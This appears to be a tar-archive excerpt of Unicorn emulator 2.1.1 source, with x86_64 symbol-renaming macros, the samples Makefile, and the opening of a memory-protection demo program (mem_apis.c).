#define helper_pfmax helper_pfmax_x86_64
#define helper_pfmin helper_pfmin_x86_64
#define helper_pfmul helper_pfmul_x86_64
#define helper_pfnacc helper_pfnacc_x86_64
#define helper_pfpnacc helper_pfpnacc_x86_64
#define helper_pfrcp helper_pfrcp_x86_64
#define helper_pfrsqrt helper_pfrsqrt_x86_64
#define helper_pfsub helper_pfsub_x86_64
#define helper_pfsubr helper_pfsubr_x86_64
#define helper_pswapd helper_pswapd_x86_64
#define helper_pshufb_mmx helper_pshufb_mmx_x86_64
#define helper_phaddw_mmx helper_phaddw_mmx_x86_64
#define helper_phaddd_mmx helper_phaddd_mmx_x86_64
#define helper_phaddsw_mmx helper_phaddsw_mmx_x86_64
#define helper_pmaddubsw_mmx helper_pmaddubsw_mmx_x86_64
#define helper_phsubw_mmx helper_phsubw_mmx_x86_64
#define helper_phsubd_mmx helper_phsubd_mmx_x86_64
#define helper_phsubsw_mmx helper_phsubsw_mmx_x86_64
#define helper_pabsb_mmx helper_pabsb_mmx_x86_64
#define helper_pabsw_mmx helper_pabsw_mmx_x86_64
#define helper_pabsd_mmx helper_pabsd_mmx_x86_64
#define helper_pmulhrsw_mmx helper_pmulhrsw_mmx_x86_64
#define helper_psignb_mmx helper_psignb_mmx_x86_64
#define helper_psignw_mmx helper_psignw_mmx_x86_64
#define helper_psignd_mmx helper_psignd_mmx_x86_64
#define helper_palignr_mmx helper_palignr_mmx_x86_64
#define helper_psrlw_xmm helper_psrlw_xmm_x86_64
#define helper_psraw_xmm helper_psraw_xmm_x86_64
#define helper_psllw_xmm helper_psllw_xmm_x86_64
#define helper_psrld_xmm helper_psrld_xmm_x86_64
#define helper_psrad_xmm helper_psrad_xmm_x86_64
#define helper_pslld_xmm helper_pslld_xmm_x86_64
#define helper_psrlq_xmm helper_psrlq_xmm_x86_64
#define helper_psllq_xmm helper_psllq_xmm_x86_64
#define helper_psrldq_xmm helper_psrldq_xmm_x86_64
#define helper_pslldq_xmm helper_pslldq_xmm_x86_64
#define helper_paddb_xmm helper_paddb_xmm_x86_64
#define helper_paddw_xmm helper_paddw_xmm_x86_64
#define helper_paddl_xmm helper_paddl_xmm_x86_64
#define helper_paddq_xmm helper_paddq_xmm_x86_64
#define helper_psubb_xmm helper_psubb_xmm_x86_64
#define helper_psubw_xmm helper_psubw_xmm_x86_64
#define helper_psubl_xmm helper_psubl_xmm_x86_64
#define helper_psubq_xmm helper_psubq_xmm_x86_64
#define helper_paddusb_xmm helper_paddusb_xmm_x86_64
#define helper_paddsb_xmm helper_paddsb_xmm_x86_64
#define helper_psubusb_xmm helper_psubusb_xmm_x86_64
#define helper_psubsb_xmm helper_psubsb_xmm_x86_64
#define helper_paddusw_xmm helper_paddusw_xmm_x86_64
#define helper_paddsw_xmm helper_paddsw_xmm_x86_64
#define helper_psubusw_xmm helper_psubusw_xmm_x86_64
#define helper_psubsw_xmm helper_psubsw_xmm_x86_64
#define helper_pminub_xmm helper_pminub_xmm_x86_64
#define helper_pmaxub_xmm helper_pmaxub_xmm_x86_64
#define helper_pminsw_xmm helper_pminsw_xmm_x86_64
#define helper_pmaxsw_xmm helper_pmaxsw_xmm_x86_64
#define helper_pand_xmm helper_pand_xmm_x86_64
#define helper_pandn_xmm helper_pandn_xmm_x86_64
#define helper_por_xmm helper_por_xmm_x86_64
#define helper_pxor_xmm helper_pxor_xmm_x86_64
#define helper_pcmpgtb_xmm helper_pcmpgtb_xmm_x86_64
#define helper_pcmpgtw_xmm helper_pcmpgtw_xmm_x86_64
#define helper_pcmpgtl_xmm helper_pcmpgtl_xmm_x86_64
#define helper_pcmpeqb_xmm helper_pcmpeqb_xmm_x86_64
#define helper_pcmpeqw_xmm helper_pcmpeqw_xmm_x86_64
#define helper_pcmpeql_xmm helper_pcmpeql_xmm_x86_64
#define helper_pmullw_xmm helper_pmullw_xmm_x86_64
#define helper_pmulhuw_xmm helper_pmulhuw_xmm_x86_64
#define helper_pmulhw_xmm helper_pmulhw_xmm_x86_64
#define helper_pavgb_xmm helper_pavgb_xmm_x86_64
#define helper_pavgw_xmm helper_pavgw_xmm_x86_64
#define helper_pmuludq_xmm helper_pmuludq_xmm_x86_64
#define helper_pmaddwd_xmm helper_pmaddwd_xmm_x86_64
#define helper_psadbw_xmm helper_psadbw_xmm_x86_64
#define helper_maskmov_xmm helper_maskmov_xmm_x86_64
#define helper_movl_mm_T0_xmm helper_movl_mm_T0_xmm_x86_64
#define helper_movq_mm_T0_xmm helper_movq_mm_T0_xmm_x86_64
#define helper_shufps helper_shufps_x86_64
#define helper_shufpd helper_shufpd_x86_64
#define helper_pshufd_xmm helper_pshufd_xmm_x86_64
#define helper_pshuflw_xmm helper_pshuflw_xmm_x86_64
#define helper_pshufhw_xmm helper_pshufhw_xmm_x86_64
#define helper_addps helper_addps_x86_64
#define helper_addss helper_addss_x86_64
#define helper_addpd helper_addpd_x86_64
#define helper_addsd helper_addsd_x86_64
#define helper_subps helper_subps_x86_64
#define helper_subss helper_subss_x86_64
#define helper_subpd helper_subpd_x86_64
#define helper_subsd helper_subsd_x86_64
#define helper_mulps helper_mulps_x86_64
#define helper_mulss helper_mulss_x86_64
#define helper_mulpd helper_mulpd_x86_64
#define helper_mulsd helper_mulsd_x86_64
#define helper_divps helper_divps_x86_64
#define helper_divss helper_divss_x86_64
#define helper_divpd helper_divpd_x86_64
#define helper_divsd helper_divsd_x86_64
#define helper_minps helper_minps_x86_64
#define helper_minss helper_minss_x86_64
#define helper_minpd helper_minpd_x86_64
#define helper_minsd helper_minsd_x86_64
#define helper_maxps helper_maxps_x86_64
#define helper_maxss helper_maxss_x86_64
#define helper_maxpd helper_maxpd_x86_64
#define helper_maxsd helper_maxsd_x86_64
#define helper_sqrtps helper_sqrtps_x86_64
#define helper_sqrtss helper_sqrtss_x86_64
#define helper_sqrtpd helper_sqrtpd_x86_64
#define helper_sqrtsd helper_sqrtsd_x86_64
#define helper_cvtps2pd helper_cvtps2pd_x86_64
#define helper_cvtpd2ps helper_cvtpd2ps_x86_64
#define helper_cvtss2sd helper_cvtss2sd_x86_64
#define helper_cvtsd2ss helper_cvtsd2ss_x86_64
#define helper_cvtdq2ps helper_cvtdq2ps_x86_64
#define helper_cvtdq2pd helper_cvtdq2pd_x86_64
#define helper_cvtpi2ps helper_cvtpi2ps_x86_64
#define helper_cvtpi2pd helper_cvtpi2pd_x86_64
#define helper_cvtsi2ss helper_cvtsi2ss_x86_64
#define helper_cvtsi2sd helper_cvtsi2sd_x86_64
#define helper_cvtsq2ss helper_cvtsq2ss_x86_64
#define helper_cvtsq2sd helper_cvtsq2sd_x86_64
#define helper_cvtps2dq helper_cvtps2dq_x86_64
#define helper_cvtpd2dq helper_cvtpd2dq_x86_64
#define helper_cvtps2pi helper_cvtps2pi_x86_64
#define helper_cvtpd2pi helper_cvtpd2pi_x86_64
#define helper_cvtss2si helper_cvtss2si_x86_64
#define helper_cvtsd2si helper_cvtsd2si_x86_64
#define helper_cvtss2sq helper_cvtss2sq_x86_64
#define helper_cvtsd2sq helper_cvtsd2sq_x86_64
#define helper_cvttps2dq helper_cvttps2dq_x86_64
#define helper_cvttpd2dq helper_cvttpd2dq_x86_64
#define helper_cvttps2pi helper_cvttps2pi_x86_64
#define helper_cvttpd2pi helper_cvttpd2pi_x86_64
#define helper_cvttss2si helper_cvttss2si_x86_64
#define helper_cvttsd2si helper_cvttsd2si_x86_64
#define helper_cvttss2sq helper_cvttss2sq_x86_64
#define helper_cvttsd2sq helper_cvttsd2sq_x86_64
#define helper_rsqrtps helper_rsqrtps_x86_64
#define helper_rsqrtss helper_rsqrtss_x86_64
#define helper_rcpps helper_rcpps_x86_64
#define helper_rcpss helper_rcpss_x86_64
#define helper_extrq_r helper_extrq_r_x86_64
#define helper_extrq_i helper_extrq_i_x86_64
#define helper_insertq_r helper_insertq_r_x86_64
#define helper_insertq_i helper_insertq_i_x86_64
#define helper_haddps helper_haddps_x86_64
#define helper_haddpd helper_haddpd_x86_64
#define helper_hsubps helper_hsubps_x86_64
#define helper_hsubpd helper_hsubpd_x86_64
#define helper_addsubps helper_addsubps_x86_64
#define helper_addsubpd helper_addsubpd_x86_64
#define helper_cmpeqps helper_cmpeqps_x86_64
#define helper_cmpeqss helper_cmpeqss_x86_64
#define helper_cmpeqpd helper_cmpeqpd_x86_64
#define helper_cmpeqsd helper_cmpeqsd_x86_64
#define helper_cmpltps helper_cmpltps_x86_64
#define helper_cmpltss helper_cmpltss_x86_64
#define helper_cmpltpd helper_cmpltpd_x86_64
#define helper_cmpltsd helper_cmpltsd_x86_64
#define helper_cmpleps helper_cmpleps_x86_64
#define helper_cmpless helper_cmpless_x86_64
#define helper_cmplepd helper_cmplepd_x86_64
#define helper_cmplesd helper_cmplesd_x86_64
#define helper_cmpunordps helper_cmpunordps_x86_64
#define helper_cmpunordss helper_cmpunordss_x86_64
#define helper_cmpunordpd helper_cmpunordpd_x86_64
#define helper_cmpunordsd helper_cmpunordsd_x86_64
#define helper_cmpneqps helper_cmpneqps_x86_64
#define helper_cmpneqss helper_cmpneqss_x86_64
#define helper_cmpneqpd helper_cmpneqpd_x86_64
#define helper_cmpneqsd helper_cmpneqsd_x86_64
#define helper_cmpnltps helper_cmpnltps_x86_64
#define helper_cmpnltss helper_cmpnltss_x86_64
#define helper_cmpnltpd helper_cmpnltpd_x86_64
#define helper_cmpnltsd helper_cmpnltsd_x86_64
#define helper_cmpnleps helper_cmpnleps_x86_64
#define helper_cmpnless helper_cmpnless_x86_64
#define helper_cmpnlepd helper_cmpnlepd_x86_64
#define helper_cmpnlesd helper_cmpnlesd_x86_64
#define helper_cmpordps helper_cmpordps_x86_64
#define helper_cmpordss helper_cmpordss_x86_64
#define helper_cmpordpd helper_cmpordpd_x86_64
#define helper_cmpordsd helper_cmpordsd_x86_64
#define helper_ucomiss helper_ucomiss_x86_64
#define helper_comiss helper_comiss_x86_64
#define helper_ucomisd helper_ucomisd_x86_64
#define helper_comisd helper_comisd_x86_64
#define helper_movmskps helper_movmskps_x86_64
#define helper_movmskpd helper_movmskpd_x86_64
#define helper_pmovmskb_xmm helper_pmovmskb_xmm_x86_64
#define helper_packsswb_xmm helper_packsswb_xmm_x86_64
#define helper_packuswb_xmm helper_packuswb_xmm_x86_64
#define helper_packssdw_xmm helper_packssdw_xmm_x86_64
#define helper_punpcklbw_xmm helper_punpcklbw_xmm_x86_64
#define helper_punpcklwd_xmm helper_punpcklwd_xmm_x86_64
#define helper_punpckldq_xmm helper_punpckldq_xmm_x86_64
#define helper_punpcklqdq_xmm helper_punpcklqdq_xmm_x86_64
#define helper_punpckhbw_xmm helper_punpckhbw_xmm_x86_64
#define helper_punpckhwd_xmm helper_punpckhwd_xmm_x86_64
#define helper_punpckhdq_xmm helper_punpckhdq_xmm_x86_64
#define helper_punpckhqdq_xmm helper_punpckhqdq_xmm_x86_64
#define helper_pshufb_xmm helper_pshufb_xmm_x86_64
#define helper_phaddw_xmm helper_phaddw_xmm_x86_64
#define helper_phaddd_xmm helper_phaddd_xmm_x86_64
#define helper_phaddsw_xmm helper_phaddsw_xmm_x86_64
#define helper_pmaddubsw_xmm helper_pmaddubsw_xmm_x86_64
#define helper_phsubw_xmm helper_phsubw_xmm_x86_64
#define helper_phsubd_xmm helper_phsubd_xmm_x86_64
#define helper_phsubsw_xmm helper_phsubsw_xmm_x86_64
#define helper_pabsb_xmm helper_pabsb_xmm_x86_64
#define helper_pabsw_xmm helper_pabsw_xmm_x86_64
#define helper_pabsd_xmm helper_pabsd_xmm_x86_64
#define helper_pmulhrsw_xmm helper_pmulhrsw_xmm_x86_64
#define helper_psignb_xmm helper_psignb_xmm_x86_64
#define helper_psignw_xmm helper_psignw_xmm_x86_64
#define helper_psignd_xmm helper_psignd_xmm_x86_64
#define helper_palignr_xmm helper_palignr_xmm_x86_64
#define helper_pblendvb_xmm helper_pblendvb_xmm_x86_64
#define helper_blendvps_xmm helper_blendvps_xmm_x86_64
#define helper_blendvpd_xmm helper_blendvpd_xmm_x86_64
#define helper_ptest_xmm helper_ptest_xmm_x86_64
#define helper_pmovsxbw_xmm helper_pmovsxbw_xmm_x86_64
#define helper_pmovsxbd_xmm helper_pmovsxbd_xmm_x86_64
#define helper_pmovsxbq_xmm helper_pmovsxbq_xmm_x86_64
#define helper_pmovsxwd_xmm helper_pmovsxwd_xmm_x86_64
#define helper_pmovsxwq_xmm helper_pmovsxwq_xmm_x86_64
#define helper_pmovsxdq_xmm helper_pmovsxdq_xmm_x86_64
#define helper_pmovzxbw_xmm helper_pmovzxbw_xmm_x86_64
#define helper_pmovzxbd_xmm helper_pmovzxbd_xmm_x86_64
#define helper_pmovzxbq_xmm helper_pmovzxbq_xmm_x86_64
#define helper_pmovzxwd_xmm helper_pmovzxwd_xmm_x86_64
#define helper_pmovzxwq_xmm helper_pmovzxwq_xmm_x86_64
#define helper_pmovzxdq_xmm helper_pmovzxdq_xmm_x86_64
#define helper_pmuldq_xmm helper_pmuldq_xmm_x86_64
#define helper_pcmpeqq_xmm helper_pcmpeqq_xmm_x86_64
#define helper_packusdw_xmm helper_packusdw_xmm_x86_64
#define helper_pminsb_xmm helper_pminsb_xmm_x86_64
#define helper_pminsd_xmm helper_pminsd_xmm_x86_64
#define helper_pminuw_xmm helper_pminuw_xmm_x86_64
#define helper_pminud_xmm helper_pminud_xmm_x86_64
#define helper_pmaxsb_xmm helper_pmaxsb_xmm_x86_64
#define helper_pmaxsd_xmm helper_pmaxsd_xmm_x86_64
#define helper_pmaxuw_xmm helper_pmaxuw_xmm_x86_64
#define helper_pmaxud_xmm helper_pmaxud_xmm_x86_64
#define helper_pmulld_xmm helper_pmulld_xmm_x86_64
#define helper_phminposuw_xmm helper_phminposuw_xmm_x86_64
#define helper_roundps_xmm helper_roundps_xmm_x86_64
#define helper_roundpd_xmm helper_roundpd_xmm_x86_64
#define helper_roundss_xmm helper_roundss_xmm_x86_64
#define helper_roundsd_xmm helper_roundsd_xmm_x86_64
#define helper_blendps_xmm helper_blendps_xmm_x86_64
#define helper_blendpd_xmm helper_blendpd_xmm_x86_64
#define helper_pblendw_xmm helper_pblendw_xmm_x86_64
#define helper_dpps_xmm helper_dpps_xmm_x86_64
#define helper_dppd_xmm helper_dppd_xmm_x86_64
#define helper_mpsadbw_xmm helper_mpsadbw_xmm_x86_64
#define helper_pcmpgtq_xmm helper_pcmpgtq_xmm_x86_64
#define helper_pcmpestri_xmm helper_pcmpestri_xmm_x86_64
#define helper_pcmpestrm_xmm helper_pcmpestrm_xmm_x86_64
#define helper_pcmpistri_xmm helper_pcmpistri_xmm_x86_64
#define helper_pcmpistrm_xmm helper_pcmpistrm_xmm_x86_64
#define helper_crc32 helper_crc32_x86_64
#define helper_pclmulqdq_xmm helper_pclmulqdq_xmm_x86_64
#define helper_aesdec_xmm helper_aesdec_xmm_x86_64
#define helper_aesdeclast_xmm helper_aesdeclast_xmm_x86_64
#define helper_aesenc_xmm helper_aesenc_xmm_x86_64
#define helper_aesenclast_xmm helper_aesenclast_xmm_x86_64
#define helper_aesimc_xmm helper_aesimc_xmm_x86_64
#define helper_aeskeygenassist_xmm helper_aeskeygenassist_xmm_x86_64
#define cpu_sync_bndcs_hflags cpu_sync_bndcs_hflags_x86_64
#define cpu_x86_support_mca_broadcast cpu_x86_support_mca_broadcast_x86_64
#define x86_cpu_set_a20 x86_cpu_set_a20_x86_64
#define cpu_x86_update_cr0 cpu_x86_update_cr0_x86_64
#define cpu_x86_update_cr3 cpu_x86_update_cr3_x86_64
#define cpu_x86_update_cr4 cpu_x86_update_cr4_x86_64
#define x86_cpu_get_phys_page_attrs_debug x86_cpu_get_phys_page_attrs_debug_x86_64
#define cpu_x86_get_descr_debug cpu_x86_get_descr_debug_x86_64
cpu_x86_get_descr_debug_x86_64 #define do_cpu_init do_cpu_init_x86_64 #define do_cpu_sipi do_cpu_sipi_x86_64 #define x86_cpu_exec_enter x86_cpu_exec_enter_x86_64 #define x86_cpu_exec_exit x86_cpu_exec_exit_x86_64 #define x86_ldub_phys x86_ldub_phys_x86_64 #define x86_lduw_phys x86_lduw_phys_x86_64 #define x86_ldl_phys x86_ldl_phys_x86_64 #define x86_ldq_phys x86_ldq_phys_x86_64 #define x86_stb_phys x86_stb_phys_x86_64 #define x86_stl_phys_notdirty x86_stl_phys_notdirty_x86_64 #define x86_stw_phys x86_stw_phys_x86_64 #define x86_stl_phys x86_stl_phys_x86_64 #define x86_stq_phys x86_stq_phys_x86_64 #define helper_divb_AL helper_divb_AL_x86_64 #define helper_idivb_AL helper_idivb_AL_x86_64 #define helper_divw_AX helper_divw_AX_x86_64 #define helper_idivw_AX helper_idivw_AX_x86_64 #define helper_divl_EAX helper_divl_EAX_x86_64 #define helper_idivl_EAX helper_idivl_EAX_x86_64 #define helper_aam helper_aam_x86_64 #define helper_aad helper_aad_x86_64 #define helper_aaa helper_aaa_x86_64 #define helper_aas helper_aas_x86_64 #define helper_daa helper_daa_x86_64 #define helper_das helper_das_x86_64 #define helper_divq_EAX helper_divq_EAX_x86_64 #define helper_idivq_EAX helper_idivq_EAX_x86_64 #define helper_pdep helper_pdep_x86_64 #define helper_pext helper_pext_x86_64 #define helper_rclb helper_rclb_x86_64 #define helper_rcrb helper_rcrb_x86_64 #define helper_rclw helper_rclw_x86_64 #define helper_rcrw helper_rcrw_x86_64 #define helper_rcll helper_rcll_x86_64 #define helper_rcrl helper_rcrl_x86_64 #define helper_rclq helper_rclq_x86_64 #define helper_rcrq helper_rcrq_x86_64 #define helper_cr4_testbit helper_cr4_testbit_x86_64 #define helper_rdrand helper_rdrand_x86_64 #define helper_cmpxchg8b_unlocked helper_cmpxchg8b_unlocked_x86_64 #define helper_cmpxchg8b helper_cmpxchg8b_x86_64 #define helper_cmpxchg16b_unlocked helper_cmpxchg16b_unlocked_x86_64 #define helper_cmpxchg16b helper_cmpxchg16b_x86_64 #define helper_boundw helper_boundw_x86_64 #define helper_boundl helper_boundl_x86_64 #define helper_outb helper_outb_x86_64 #define helper_inb helper_inb_x86_64 #define helper_outw helper_outw_x86_64 #define helper_inw helper_inw_x86_64 #define helper_outl helper_outl_x86_64 #define helper_inl helper_inl_x86_64 #define helper_into helper_into_x86_64 #define helper_cpuid helper_cpuid_x86_64 #define helper_read_crN helper_read_crN_x86_64 #define helper_write_crN helper_write_crN_x86_64 #define helper_lmsw helper_lmsw_x86_64 #define helper_invlpg helper_invlpg_x86_64 #define helper_rdtsc helper_rdtsc_x86_64 #define helper_rdtscp helper_rdtscp_x86_64 #define helper_rdpmc helper_rdpmc_x86_64 #define helper_wrmsr helper_wrmsr_x86_64 #define helper_rdmsr helper_rdmsr_x86_64 #define helper_hlt helper_hlt_x86_64 #define helper_monitor helper_monitor_x86_64 #define helper_mwait helper_mwait_x86_64 #define helper_pause helper_pause_x86_64 #define helper_debug helper_debug_x86_64 #define helper_rdpkru helper_rdpkru_x86_64 #define helper_wrpkru helper_wrpkru_x86_64 #define helper_bndck helper_bndck_x86_64 #define helper_bndldx64 helper_bndldx64_x86_64 #define helper_bndldx32 helper_bndldx32_x86_64 #define helper_bndstx64 helper_bndstx64_x86_64 #define helper_bndstx32 helper_bndstx32_x86_64 #define helper_bnd_jmp helper_bnd_jmp_x86_64 #define helper_syscall helper_syscall_x86_64 #define helper_sysret helper_sysret_x86_64 #define x86_cpu_do_interrupt x86_cpu_do_interrupt_x86_64 #define do_interrupt_x86_hardirq do_interrupt_x86_hardirq_x86_64 #define x86_cpu_exec_interrupt x86_cpu_exec_interrupt_x86_64 #define 
helper_lldt helper_lldt_x86_64 #define helper_ltr helper_ltr_x86_64 #define uc_check_cpu_x86_load_seg uc_check_cpu_x86_load_seg_x86_64 #define helper_load_seg helper_load_seg_x86_64 #define helper_ljmp_protected helper_ljmp_protected_x86_64 #define helper_lcall_real helper_lcall_real_x86_64 #define helper_lcall_protected helper_lcall_protected_x86_64 #define helper_iret_real helper_iret_real_x86_64 #define helper_iret_protected helper_iret_protected_x86_64 #define helper_lret_protected helper_lret_protected_x86_64 #define helper_sysenter helper_sysenter_x86_64 #define helper_sysexit helper_sysexit_x86_64 #define helper_lsl helper_lsl_x86_64 #define helper_lar helper_lar_x86_64 #define helper_verr helper_verr_x86_64 #define helper_verw helper_verw_x86_64 #define cpu_x86_load_seg cpu_x86_load_seg_x86_64 #define helper_check_iob helper_check_iob_x86_64 #define helper_check_iow helper_check_iow_x86_64 #define helper_check_iol helper_check_iol_x86_64 #define do_smm_enter do_smm_enter_x86_64 #define helper_rsm helper_rsm_x86_64 #define helper_vmrun helper_vmrun_x86_64 #define helper_vmmcall helper_vmmcall_x86_64 #define helper_vmload helper_vmload_x86_64 #define helper_vmsave helper_vmsave_x86_64 #define helper_stgi helper_stgi_x86_64 #define helper_clgi helper_clgi_x86_64 #define helper_skinit helper_skinit_x86_64 #define helper_invlpga helper_invlpga_x86_64 #define cpu_svm_check_intercept_param cpu_svm_check_intercept_param_x86_64 #define helper_svm_check_intercept_param helper_svm_check_intercept_param_x86_64 #define helper_svm_check_io helper_svm_check_io_x86_64 #define cpu_vmexit cpu_vmexit_x86_64 #define do_vmexit do_vmexit_x86_64 #define tcg_x86_init tcg_x86_init_x86_64 #define gen_intermediate_code gen_intermediate_code_x86_64 #define restore_state_to_opc restore_state_to_opc_x86_64 #define x86_cpu_xsave_all_areas x86_cpu_xsave_all_areas_x86_64 #define x86_cpu_xrstor_all_areas x86_cpu_xrstor_all_areas_x86_64 #define cpu_get_fp80 cpu_get_fp80_x86_64 #define cpu_set_fp80 cpu_set_fp80_x86_64 #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014650�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/Makefile����������������������������������������������������������������������0000664�0000000�0000000�00000005630�14675241067�0016314�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Unicorn Engine # By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 include ../config.mk UNAME_S := $(shell uname -s) LIBDIR = .. 
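# ---------------------------------------------------------------------------
# Editor's note (not part of the original Makefile): the knobs below are all
# overridable from the make command line. A hedged usage sketch -- the exact
# cross-toolchain prefix is an assumption, adjust for your environment:
#
#   make              # quiet build of every sample enabled in ../config.log
#   make V=1          # echo the full compiler/linker command lines
#   make CROSS=arm-linux-gnueabi-   # hypothetical cross toolchain prefix
#   make UNICORN_ASAN=yes           # rebuild with clang + AddressSanitizer
# ---------------------------------------------------------------------------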
BIN_EXT = AR_EXT = a # Verbose output? V ?= 0 CFLAGS += -Wall -Werror -I../include LDFLAGS += -L$(LIBDIR) -lunicorn -lpthread -lm ifeq ($(UNAME_S), Linux) LDFLAGS += -lrt endif LDLIBS += -lpthread -lunicorn -lm ifneq ($(CROSS),) CC = $(CROSS)gcc endif ifeq ($(UNICORN_ASAN),yes) CC = clang CXX = clang++ AR = llvm-ar CFLAGS += -fsanitize=address -fno-omit-frame-pointer LDFLAGS := -fsanitize=address ${LDFLAGS} endif # Cygwin? ifneq ($(filter CYGWIN%,$(UNAME_S)),) CFLAGS := $(CFLAGS:-fPIC=) LDLIBS += -lssp BIN_EXT = .exe AR_EXT = a # mingw? else ifneq ($(filter MINGW%,$(UNAME_S)),) CFLAGS := $(CFLAGS:-fPIC=) BIN_EXT = .exe AR_EXT = a endif ifeq ($(UNICORN_STATIC),yes) ifneq ($(filter MINGW%,$(UNAME_S)),) ARCHIVE = $(LIBDIR)/unicorn.$(AR_EXT) else ifneq ($(filter CYGWIN%,$(UNAME_S)),) ARCHIVE = $(LIBDIR)/libunicorn.$(AR_EXT) else ARCHIVE = $(LIBDIR)/libunicorn.$(AR_EXT) endif endif .PHONY: all clean UNICORN_ARCHS := $(shell if [ -e ../config.log ]; then cat ../config.log;\ else printf "$(UNICORN_ARCHS)"; fi) SOURCES = ifneq (,$(findstring arm,$(UNICORN_ARCHS))) SOURCES += sample_arm.c SOURCES += sample_armeb.c endif ifneq (,$(findstring aarch64,$(UNICORN_ARCHS))) SOURCES += sample_arm64.c SOURCES += sample_arm64eb.c endif ifneq (,$(findstring mips,$(UNICORN_ARCHS))) SOURCES += sample_mips.c endif #ifneq (,$(findstring ppc,$(UNICORN_ARCHS))) #SOURCES += sample_ppc.c #endif ifneq (,$(findstring sparc,$(UNICORN_ARCHS))) SOURCES += sample_sparc.c endif ifneq (,$(findstring x86,$(UNICORN_ARCHS))) SOURCES += sample_x86.c SOURCES += shellcode.c SOURCES += mem_apis.c SOURCES += sample_x86_32_gdt_and_seg_regs.c SOURCES += sample_batch_reg.c SOURCES += sample_mmu.c endif ifneq (,$(findstring m68k,$(UNICORN_ARCHS))) SOURCES += sample_m68k.c endif ifneq (,$(findstring tricore,$(UNICORN_ARCHS))) SOURCES += sample_tricore.c endif BINS = $(SOURCES:.c=$(BIN_EXT)) OBJS = $(SOURCES:.c=.o) all: $(BINS) $(BINS): $(OBJS) clean: rm -rf *.o $(BINS) %$(BIN_EXT): %.o @mkdir -p $(@D) ifeq ($(V),0) ifeq ($(UNICORN_SHARED),yes) $(call log,LINK,$(notdir $@)) @$(link-dynamic) endif ifeq ($(UNICORN_STATIC),yes) ifneq ($(filter MINGW%,$(UNAME_S)),) $(call log,LINK,$(notdir $(call staticname,$@))) @$(link-static) endif endif else ifeq ($(UNICORN_SHARED),yes) $(link-dynamic) endif ifeq ($(UNICORN_STATIC),yes) ifneq ($(filter MINGW%,$(UNAME_S)),) $(link-static) endif endif endif %.o: %.c @mkdir -p $(@D) ifeq ($(V),0) $(call log,CC,$(@:%=%)) @$(compile) else $(compile) endif define link-dynamic $(CC) $< ${CFLAGS} $(LDFLAGS) -o $@ endef define link-static $(CC) $< $(ARCHIVE) ${CFLAGS} $(LDFLAGS) -o $(call staticname,$@) endef staticname = $(subst $(BIN_EXT),,$(1)).static$(BIN_EXT) define log @printf " %-7s %s\n" "$(1)" "$(2)" endef define compile ${CC} ${CFLAGS} -c $< -o $@ endef ��������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/mem_apis.c��������������������������������������������������������������������0000664�0000000�0000000�00000026400�14675241067�0016610�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Sample use of uc_mem_unmap, uc_mem_protect, and memory permissions Copyright(c) 2015 Chris Eagle This program is free software; you can 
redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #define __STDC_FORMAT_MACROS #include <unicorn/unicorn.h> #include <string.h> #include <stdlib.h> #include <string.h> #include <time.h> static int insts_executed; // callback for tracing instructions, detect HLT and terminate emulation static void hook_code(uc_engine *uc, uint64_t addr, uint32_t size, void *user_data) { uint8_t opcode; unsigned char buf[256]; insts_executed++; if (uc_mem_read(uc, addr, buf, size) != UC_ERR_OK) { printf("not ok - uc_mem_read fail during hook_code callback, addr: " "0x%" PRIx64 "\n", addr); if (uc_emu_stop(uc) != UC_ERR_OK) { printf("not ok - uc_emu_stop fail during hook_code callback, addr: " "0x%" PRIx64 "\n", addr); _exit(-1); } } opcode = buf[0]; switch (opcode) { case 0x41: // inc ecx if (uc_mem_protect(uc, 0x101000, 0x1000, UC_PROT_READ) != UC_ERR_OK) { printf("not ok - uc_mem_protect fail during hook_code callback, " "addr: 0x%" PRIx64 "\n", addr); _exit(-1); } break; case 0x42: // inc edx if (uc_mem_unmap(uc, 0x101000, 0x1000) != UC_ERR_OK) { printf("not ok - uc_mem_unmap fail during hook_code callback, " "addr: 0x%" PRIx64 "\n", addr); _exit(-1); } break; case 0xf4: // hlt if (uc_emu_stop(uc) != UC_ERR_OK) { printf("not ok - uc_emu_stop fail during hook_code callback, addr: " "0x%" PRIx64 "\n", addr); _exit(-1); } break; default: // all others break; } } // callback for tracing invalid memory access (READ/WRITE/EXEC) static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t addr, int size, int64_t value, void *user_data) { switch (type) { default: printf("not ok - UC_HOOK_MEM_INVALID type: %d at 0x%" PRIx64 "\n", type, addr); return false; case UC_MEM_READ_UNMAPPED: printf("not ok - Read from invalid memory at 0x%" PRIx64 ", data size = %u\n", addr, size); return false; case UC_MEM_WRITE_UNMAPPED: printf("not ok - Write to invalid memory at 0x%" PRIx64 ", data size = %u, data value = 0x%" PRIx64 "\n", addr, size, value); return false; case UC_MEM_FETCH_PROT: printf("not ok - Fetch from non-executable memory at 0x%" PRIx64 "\n", addr); return false; case UC_MEM_WRITE_PROT: printf("not ok - Write to non-writeable memory at 0x%" PRIx64 ", data size = %u, data value = 0x%" PRIx64 "\n", addr, size, value); return false; case UC_MEM_READ_PROT: printf("not ok - Read from non-readable memory at 0x%" PRIx64 ", data size = %u\n", addr, size); return false; } } static void do_nx_demo(bool cause_fault) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint8_t code_buf[0x3000]; insts_executed = 0; printf("===================================\n"); printf("# Example of marking memory NX (%s)\n", cause_fault ? 
